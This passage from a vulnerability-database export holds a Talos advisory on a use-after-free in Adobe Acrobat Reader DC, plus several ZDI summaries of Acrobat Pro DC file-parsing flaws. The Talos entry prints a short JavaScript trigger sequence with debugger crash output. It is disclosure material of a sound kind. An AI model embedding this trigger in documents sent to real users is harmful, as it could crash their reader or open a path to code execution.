order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.011.20038\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. 
It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The one method call required to trigger this vulnerability is privileged, and can only be called from trusted functions or from a trusted location.\n\nAdobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout, and poses additional attack surfaces.\n\nWhile executing the following piece of code, a cache misuse can lead to a dereference of a previously freed object, which can cause further memory corruption:\n \n \n this.Net.Subscriptions.addUI({},[],'b'); \n this.spell.languages;\n a = this.Collab.drivers;\n this.SetRSSMethods('a',{});\n JSON.stringify(a);\n \n\nWhile executing `JSON.stringify()` method on indirect reference to `this.Collab.drivers` object, an invalid pointer is retrieved, leading to a crash on the following address:\n \n \n (100c.174c): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=253b8ef8 ebx=00000000 ecx=5ef4a370 edx=5ef4a378 esi=1def2fc0 edi=6e866fb8\n eip=5ebd7790 esp=001ac550 ebp=001ac570 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n Annots!PlugInMain+0x7388f:\n 5ebd7790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????\n \n\nStepping back, we can see that pointer in `eax` comes from the following function call:\n \n \n 0:000> u eip-14\n Annots!PlugInMain+0x7387b:\n 5ebd777c 6870a3f45e push offset Annots!PlugInMain+0x3e646f (5ef4a370)\n 5ebd7781 ff7508 push dword ptr [ebp+8]\n 5ebd7784 ff90cc000000 call dword ptr [eax+0CCh]\n 0:000> da 
Annots!PlugInMain+0x3e646f\n 5ef4a370 \"CRSSFeedUI\"\n \n\nThis is an indirect call to cachehash methods in `EScript.api` referencing `CRSSFeedUI` object, and a pointer to a freed object is returned:\n \n \n 0:000> !heap -p -a eax\n address 253b8ef8 found in\n _DPH_HEAP_ROOT @ 1b1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 252b14ac: 253b8000 2000\n 6b1e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2\n 774969cc ntdll!RtlDebugFreeHeap+0x0000002f\n 77459e07 ntdll!RtlpFreeHeap+0x0000005d\n 774263a6 ntdll!RtlFreeHeap+0x00000142\n 7565c614 kernel32!HeapFree+0x00000014\n 6901ecfa MSVCR120!free+0x0000001a [f:\\dd\\vctools\\crt\\crtw32\\heap\\free.c @ 51]\n 610c524f EScript!PlugInMain+0x000026b0\n 610c5206 EScript!PlugInMain+0x00002667\n 61101c50 EScript!mozilla::HashBytes+0x000315da\n 610d388f EScript!mozilla::HashBytes+0x00003219\n 610d32f3 EScript!mozilla::HashBytes+0x00002c7d\n 611f5d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067\n 611f6342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d\n 611f5baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca\n 611f633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656\n 611f7140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b\n 611f518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9\n 610f75ce EScript!mozilla::HashBytes+0x00026f58\n 610f17da EScript!mozilla::HashBytes+0x00021164\n 610f0606 EScript!mozilla::HashBytes+0x0001ff90\n 610f0511 EScript!mozilla::HashBytes+0x0001fe9b\n 610f0458 EScript!mozilla::HashBytes+0x0001fde2\n 610d9e2e EScript!mozilla::HashBytes+0x000097b8\n 611185ec EScript!mozilla::HashBytes+0x00047f76\n 61118370 EScript!mozilla::HashBytes+0x00047cfa\n 61117de3 EScript!mozilla::HashBytes+0x0004776d\n 61116cd5 
EScript!mozilla::HashBytes+0x0004665f\n 61186428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 58e4ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d\n 58d8cb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 58d8922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n 58bdefca AcroRd32!AX_PDXlateToHostEx+0x0015a229\n \n\nIf we examine the code immediately following the point of the crash, we can see the following:\n \n \n 0:000> u eip\n Annots!PlugInMain+0x7388f:\n 5ebd7790 8b10 mov edx,dword ptr [eax]\n 5ebd7792 8d4df0 lea ecx,[ebp-10h]\n 5ebd7795 51 push ecx\n 5ebd7796 8bc8 mov ecx,eax\n 5ebd7798 ff5248 call dword ptr [edx+48h]\n \n\nSince the area of the freed memory is quickly used in an indirect `call` instruction, having control over the contents of this freed memory region can lead to arbitrary code execution.\n\nIt should be noted that this issue is very similar in nature to TALOS-2018-0569.\n\n### Crash Information\n \n \n 0:000> g\n (17e0.153c): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=253b8ef8 ebx=00000000 ecx=5f1ca370 edx=5f1ca378 esi=1dea2fc0 edi=6e66cfb8\n eip=5ee57790 esp=0052c948 ebp=0052c968 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n Annots!PlugInMain+0x7388f:\n 5ee57790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????\n 0:000> !heap -p -a eax \n address 253b8ef8 found in\n _DPH_HEAP_ROOT @ 61000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 252b14ac: 253b8000 2000\n 66d590b2 verifier!AVrfDebugPageHeapFree+0x000000c2\n 774969cc ntdll!RtlDebugFreeHeap+0x0000002f\n 77459e07 ntdll!RtlpFreeHeap+0x0000005d\n 774263a6 ntdll!RtlFreeHeap+0x00000142\n 7565c614 kernel32!HeapFree+0x00000014\n 6901ecfa MSVCR120!free+0x0000001a [f:\\dd\\vctools\\crt\\crtw32\\heap\\free.c @ 51]\n 5f50524f 
EScript!PlugInMain+0x000026b0\n 5f505206 EScript!PlugInMain+0x00002667\n 5f541c50 EScript!mozilla::HashBytes+0x000315da\n 5f51388f EScript!mozilla::HashBytes+0x00003219\n 5f5132f3 EScript!mozilla::HashBytes+0x00002c7d\n 5f635d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067\n 5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d\n 5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca\n 5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656\n 5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b\n 5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9\n 5f5375ce EScript!mozilla::HashBytes+0x00026f58\n 5f5317da EScript!mozilla::HashBytes+0x00021164\n 5f530606 EScript!mozilla::HashBytes+0x0001ff90\n 5f530511 EScript!mozilla::HashBytes+0x0001fe9b\n 5f530458 EScript!mozilla::HashBytes+0x0001fde2\n 5f519e2e EScript!mozilla::HashBytes+0x000097b8\n 5f5585ec EScript!mozilla::HashBytes+0x00047f76\n 5f558370 EScript!mozilla::HashBytes+0x00047cfa\n 5f557de3 EScript!mozilla::HashBytes+0x0004776d\n 5f556cd5 EScript!mozilla::HashBytes+0x0004665f\n 5f5c6428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743\n 5a57ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d\n 5a4bcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce\n 5a4b922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc\n 5a30efca AcroRd32!AX_PDXlateToHostEx+0x0015a229\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. 
Following frames may be wrong.\n 00 0052c968 5f53d6ca Annots!PlugInMain+0x7388f\n 01 0052c9d8 5f541c50 EScript!mozilla::HashBytes+0x2d054\n 02 0052ca08 5f51388f EScript!mozilla::HashBytes+0x315da\n 03 0052ca98 5f5132f3 EScript!mozilla::HashBytes+0x3219\n 04 0052cab4 5f635d4c EScript!mozilla::HashBytes+0x2c7d\n 05 0052cb74 5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf067\n 06 0052cc08 5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf65d\n 07 0052cc54 5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xceeca\n 08 0052cce8 5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf656\n 09 0052ce8c 5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xd045b\n 0a 0052cf28 5f5375ce EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xce4a9\n 0b 0052cf9c 5f5317da EScript!mozilla::HashBytes+0x26f58\n 0:000> u\n Annots!PlugInMain+0x7388f:\n 5ee57790 8b10 mov edx,dword ptr [eax]\n 5ee57792 8d4df0 lea ecx,[ebp-10h]\n 5ee57795 51 push ecx\n 5ee57796 8bc8 mov ecx,eax\n 5ee57798 ff5248 call dword ptr [edx+48h]\n 5ee5779b 8365fc00 and dword ptr [ebp-4],0\n 5ee5779f 8bc8 mov ecx,eax\n 5ee577a1 8b35000d2c5f mov esi,dword ptr [Annots!PlugInMain+0x4dcdff (5f2c0d00)]\n \n\n### Timeline\n\n2018-05-08 - Vendor Disclosure \n2018-07-10 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n", "edition": 3, "modified": "2018-07-10T00:00:00", "published": "2018-07-10T00:00:00", "id": "TALOS-2018-0592", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0592", "title": "Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:28", "bulletinFamily": "info", "cvelist": ["CVE-2018-4972"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-456", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-456/", "title": "Adobe Acrobat Pro DC ImageConversion EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:42", "bulletinFamily": "info", "cvelist": ["CVE-2018-4970"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. 
An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-454", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-454/", "title": "Adobe Acrobat Pro DC ImageConversion EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:08", "bulletinFamily": "info", "cvelist": ["CVE-2018-4973"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-457", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-457/", "title": "Adobe Acrobat Pro DC ImageConversion JPEG Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-4949"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 
The specific flaw exists within the parsing of EMR_COMMENT structures embedded inside EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-06-26T00:00:00", "id": "ZDI-18-598", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-598/", "title": "Adobe Acrobat Pro DC ImageConversion EMF EMR_COMMENT Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:23", "bulletinFamily": "info", "cvelist": ["CVE-2018-4949"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. 
An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-437", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-437/", "title": "Adobe Acrobat Pro DC EMF Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:12", "bulletinFamily": "info", "cvelist": ["CVE-2018-4950"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the EMR_STRETCHDIBITS record in EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-438", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-438/", "title": "Adobe Acrobat Pro DC EMF EMR_STRETCHDIBITS Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:07", "bulletinFamily": "info", "cvelist": ["CVE-2018-4981"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG images embedded inside EMF files. 
The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-465", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-465/", "title": "Adobe Acrobat Pro DC ImageConversion EMF JPEG Parsing Memory Corruption Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:42:11", "bulletinFamily": "info", "cvelist": ["CVE-2018-4968"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMR_CREATEDIBPATTERNBRUSHPT structures in EMF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-452", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-452/", "title": "Adobe Acrobat Pro DC ImageConversion EMF EMR_CREATEDIBPATTERNBRUSHPT Heap-based Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2018-4976"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Adobe Acrobat Pro DC. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EmfPlusDrawCurve records in EMF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-460", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-460/", "title": "Adobe Acrobat Pro DC ImageConversion EMF EmfPlusDrawCurve Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:39", "bulletinFamily": "info", "cvelist": ["CVE-2018-4967"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat Pro DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "edition": 1, "modified": "2018-06-22T00:00:00", "published": "2018-05-15T00:00:00", "id": "ZDI-18-451", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-451/", "title": "Adobe Acrobat Pro DC ImageConversion XPS Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}